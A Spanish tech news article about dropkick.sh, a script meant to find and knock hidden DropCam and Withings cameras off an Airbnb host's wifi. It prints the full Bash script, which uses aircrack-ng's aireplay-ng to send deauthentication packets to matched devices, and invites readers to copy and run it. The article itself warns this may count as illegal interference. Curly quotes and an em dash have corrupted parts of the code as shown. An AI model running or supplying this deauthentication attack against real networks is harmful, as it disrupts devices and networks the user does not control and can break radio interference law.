Las ultimas noticias en tecnología, ciencia y cultura digital.

Este script detecta y evita que tu anfitrión de Airbnb te grabe con una webcam

Imagen: Nest

Está expresamente prohibido por los estándares de Airbnb, pero no sería la primera vez que un anfitrión espía a sus huéspedes con cámaras ocultas, ya sea por desconfianza o con fines más morbosos. Y la creciente popularidad de las cámaras wifi no hace más que empeorar esta situación inquietante.

Un simple script que puedes copiar y pegar en el intérprete de comandos de tu PC podría sacarte de dudas. Este código creado por el desarrollador Julian Oliver encuentra y desactiva automáticamente las cámaras conectadas a la red wifi de tu Airbnb para asegurarte la privacidad que te corresponde. Solo tienes que descargar dropkick.sh y ejecutarlo en un sistema compatible.

Advertisement
#!/bin/bash # # DROPKICK.SH  # # Detect and Disconnect the DropCam and Withings devices some people are using to # spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh: # #   http://julianoliver.com/output/log_2014-05-30_20-52  # # This script was named by Adam Harvey (http://ahprojects.com), who also # encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi, # etc) and the aircrack-ng suite. I put ‘beep’ in there for a little audio # notification. Comment it out if you don’t need it. # # See also http://plugunplug.net, for a plug-and-play device that does this # based on OpenWrt. Code here: # #   https://github.com/JulianOliver/CyborgUnplug #  # Save as dropkick.sh, ‘chmod +x dropkick.sh’ and exec as follows: # #   sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>  shopt -s nocasematch # Set shell to ignore case shopt -s extglob # For non-interactive shell.  readonly NIC=$1 # Your wireless NIC readonly BSSID=$2 # Network BSSID (AirBnB WiFi network) readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk ‘{ print $5 }’) # MAC=$(ip link show “$NIC” | awk ‘/ether/ {print $2}’) # If ‘ifconfig’ not # present. readonly GGMAC=’@(30:8C:FB*|00:24:E4*)‘ # Match against DropCam and Withings  readonly POLL=30 # Check every 30 seconds readonly LOG=/var/log/dropkick.log  airmon-ng stop mon0 # Pull down any lingering monitor devices airmon-ng start $NIC # Start a monitor device  while true;     do           for TARGET in $(arp-scan -I $NIC —localnet | grep -o -E \         ‘([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}’)            do                if [[ “$TARGET” == “$GGMAC” ]]                    then                        # Audio alert                        beep -f 1000 -l 500 -n 200 -r 2                        echo “WiFi camera discovered: “$TARGET >> $LOG                        aireplay-ng -0 1 -a $BSSID -c $TARGET mon0                         echo “De-authed: “$TARGET “ from network: “ $BSSID >> $LOG                        echo ‘                              __              __    _     __          __                                                ___/ /______  ___  / /__ (_)___/ /_____ ___/ /                          / _  / __/ _ \/ _ \/   _// / __/   _/ -_) _  /                          \_,_/_/  \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/                                       /_/                         ‘                                                             else                         echo $TARGET”: is not a DropCam or Withings device. Leaving alone..”                fi            done            echo “None found this round.”            sleep $POLL done airmon-ng stop mon0

Pero ten en cuenta que ejecutar el script podría ser ilegal en países como Estados Unidos, donde la Comisión Federal de Comunicaciones clasifica la desactivación de clientes wifi como una interferencia intencionada. Claro que también suele ser ilegal que te graben sin avisarte. [Julian Oliver]

Share This Story

About the author

Matías S. Zavia

Matías tiene dos grandes pasiones: Internet y el dulce de leche

EmailTwitterPosts
PGP Fingerprint: 08B1 8FBD 5DA0 45F1 2C2D F329 BD6D 0689 6FB2 7BEBPGP Key